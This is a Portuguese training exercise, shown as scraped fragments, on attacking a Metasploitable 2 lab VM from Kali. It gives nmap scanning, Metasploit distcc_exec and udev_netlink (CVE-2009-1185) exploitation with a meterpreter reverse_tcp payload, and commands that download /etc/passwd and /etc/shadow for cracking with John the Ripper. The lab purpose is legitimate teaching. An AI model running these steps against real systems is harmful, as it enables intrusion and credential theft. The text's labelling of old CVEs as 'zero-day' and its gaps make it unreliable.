Escolar Documentos
Profissional Documentos
Cultura Documentos
Linux Metasploitable 2
msfadmin
Invasão em ambiente Linux
É sempre um Zero-day!
O distcc funciona como um agente para o compilador. Um daemon distcc deve ser
executado em cada uma das máquinas participantes.
1 – No virtualbox, inicie a máquina Kali do Atacante e a máquina Metasploitable 2 – que será nosso Linux vítima.
Confira o ip das duas máquinas utilizando o seguinte comando:
2 – No Kali, abra uma janela TERMINAL e faça um scanning de portas no Linux vítima:
3 – Observe as portas encontradas. Agora execute novamente o nmap checando todas as portas TCP:
4 – Observe a porta 3632. Esta porta indica a existência do daemon (nome dado para os “serviços” do Windows) de
nome distccd. Vamos procurar um exploit para tentar explorar o zero-day deste daemon. Para isto, carregue no Kali o
MSFCONSOLE:
msfconsole
search distcc
Use exploit/unix/misc/distcc_exec
Exploração em ambiente Linux - Exercícios
show options
set rhosts <ip do Metasploitable>
set rport 3632
9 – Execute o exploit:
run
10 – Se você configurou tudo corretamente, não deu erro algum, mas também não apareceu nada. Isto porque você já
tomou controle do Linux. Pra ter certeza, digite:
uname -a
11 – Você deve ter visto a versão “Linux Metasploitable ...”, mostrando que você realmente invadiu o Linux. Só está
sem o cursor do Linux. Para habilitar o cursor, digite:
/bin/sh -i
Exploração em ambiente Linux - Exercícios
12 – Agora que invadimos o Linux, veja qual o usuário que estamos executando, nome do host, veja os processos que
estão sendo executados...
whoami
hostname
ps
13 – Note que são comandos do Linux, pois você está no shell, ou seja, no bash do Linux. Vamos transformar sua
sessão em um meterpreter. Pra isso, saia da sessão invadida, sem fecha-la:
background
sessions
17 - Note que você agora tem 2 sessões: uma com shell e a outra com meterpreter. Interaja com a sessão meterpreter:
getuid
sysinfo
ps
localtime
download /etc/passwd
19 - É isto, você está dentro do Linux e pode fazer o que quiser nele! Ou quase tudo. Tente copiar o arquivo shadow da
pasta etc:
download /etc/shadow
Aquivo passwd
Arquivo shadow
root
do sistema.
Um pouco de conceitos sobre udev
Zer0-day...
CVE 2009-1185
Escalação de privilégios em ambiente Linux - Exercícios
background
search udev
use exploit/linux/local/udev_netlink
Set payload Linux/x86/meterpreter/reverse_tcp
getuid
Download /etc/shadow
getuid
Download /etc/shadow
25- Abra uma nova janela terminal no kali e execute o seguinte comando para combinar o arquivo de usuários com o
arquivo de senhas criptografado:
26- Agora de posse do arquivo combinado, aplique o programa John de ripper para tentar descobrir as senhas dos
usuários: